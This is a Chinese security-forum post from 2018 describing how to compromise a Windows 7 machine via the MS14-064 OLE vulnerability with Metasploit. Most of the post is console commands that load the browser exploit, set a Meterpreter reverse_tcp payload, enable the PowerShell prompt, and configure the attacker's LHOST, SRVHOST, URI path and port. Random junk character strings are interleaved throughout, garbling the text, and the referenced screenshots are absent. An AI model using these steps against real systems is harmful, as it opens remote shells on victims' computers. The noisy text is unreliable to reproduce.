找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1924|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ m, w% P; [! t* P6 Y( x. B7 }' {/ d8 C 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示; L6 P1 ^. l2 i1 e

4 u) B6 `! ]* T* e* ^* e# Z

$ U" W% G: k$ r! i5 H 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 6 p/ G4 J- [( p$ ~+ r

* h* {7 V1 o7 ]& w$ G( @

2 N! A2 s: P% M* b T 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: L' t) q1 Y3 J. W6 o. X; k) x

2 a' O* X6 K1 h3 r# y

/ e& B) V7 x \' ^' a% Y7 ]; u             set AllowPowershellPrompt true ) ^/ B1 N2 C* u: w {9 |

3 v8 j7 M$ ]( z U

7 O7 a: c9 s7 I) ^ O/ i             Set LHOST 192.168.0.109 , P: c: j0 k$ ?8 ~: y& F) f7 S$ p

0 q, B' v# j- X2 o) [* H: i/ t# d* Q

' U; \- q& r- X k; W/ F             set SRVHOST 192.168.0.109 : j" E7 q: D8 u4 v# j; ]

0 P' S* g- S; s1 ]1 G" V

: R5 e' n6 A/ [+ _0 `             Set uripath share - C4 X% D6 ~- [% _0 f

( N/ q3 K6 y$ p$ x. W

) G# j6 Z0 J* g( @( n             Set srvport 804 l* V( k: G4 U, G# b, q

- }4 O' Y( d, z/ W# u2 L0 M. b/ L- w3 L

; N: L" I9 R( a- Q. `  : ]/ ^; x x# B! c% Z( s

6 \! `& P, z! z# @" ~2 y

& p! |+ B( S0 ]: p9 k( N  2 u7 q1 k y* V2 b" V" T; m8 A

8 W6 u6 U" \% q4 e3 D6 ?3 _( A

* t l1 m8 c" e v  ' ?2 X- N& D3 D$ ^7 D* ~

8 h7 L) k( L# X& r! Y

# r4 o' J% R1 J5 B  , n& L. l; W- X0 v) Q& f% t

* y- m$ w1 a0 T# Z) G" Z7 O; }

( O! Z( A' M( l+ g! `$ B/ x( ?  ' D/ v9 q: ]4 D0 ]' d! z9 g' A

7 x J% [+ S, \0 b4 D; h9 n& B9 s4 A

0 z3 Z# d) }( T6 D 下面我们来访问本地地址如图:, [: u" n0 t1 q0 h6 K

! F5 Q8 b, f3 e4 M# {

1 u! I8 P) e+ \) f  9 W/ ^7 c. k+ s2 u8 k/ V# P

" ]1 D$ H* T8 \

: A x. [0 _' O  2 s6 I% Q; y% E

+ ^5 w0 h! ?( q7 k7 A0 N

z) y1 H- Y4 O) x. T 3 }+ v( U& O( U, Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表